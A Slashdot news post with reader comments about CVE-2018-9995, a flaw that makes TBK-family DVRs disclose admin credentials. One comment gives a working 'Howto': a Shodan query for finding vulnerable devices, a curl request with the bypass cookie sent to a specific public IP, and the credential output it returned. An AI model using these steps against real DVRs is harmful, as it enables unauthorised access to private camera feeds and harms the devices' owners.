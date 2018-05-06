Follow Slashdot blog updates by subscribing to our blog RSS feed

 


New Hacking Tool Lets Users Access a Bunch of DVRs and Their Video Feeds

Posted by BeauHD from the open-sesame dept.
An anonymous reader writes: "An Argentinian security researcher named Ezequiel Fernandez has published a powerful new tool yesterday that can easily extract plaintext credentials for various DVR brands and grant attackers access to those systems, and inherently the video feeds they're supposed to record," reports Bleeping Computer. "The tool, named getDVR_Credentials, is a proof-of-concept for CVE-2018-9995, a vulnerability discovered by Fernandez at the start of last month, [affecting TBK DVR systems]. Fernandez discovered that by accessing the control panel of specific DVRs with a cookie header of 'Cookie: uid=admin,' the DVR would respond with the device's admin credentials in cleartext." Tens of thousands of vulnerable devices available online can be hijacked with their video feeds assembled in voyeur sites, like it's been done in the past.

  • If the tech industry was serious about IOT - tens or hundreds of millions of home devices that are internet connected - they should have gotten together, pooled a few Billion dollars of R&D money, and researched ways to make unauthorized access to these IOT products fucking-difficult-to-near-impossible. There are plenty of smart nerds on the market who could actually have pulled this off, given enough funding and other resources. Instead, tens millions of devices with shoddy security were sold in a worl

  • I would guess such people don't have much to steal.

  • Howto (Score:4, Interesting)

    by Xenolith0 ( 808358 ) on Sunday May 06, 2018 @04:53PM (#56564352) Homepage

    Since the article is light on actual details of how to find vulnerable machines.

    Go to shodan.io [shodan.io] and search for '<A HREF="/login.rsp">'

    Replace the IP 14.63.122.219:9000 in the example with one from Shodan's results.

    $ curl "http://14.63.122.219:9000/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
    {"result":0,"list":[{"uid":"admin","pwd":"","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295}]}

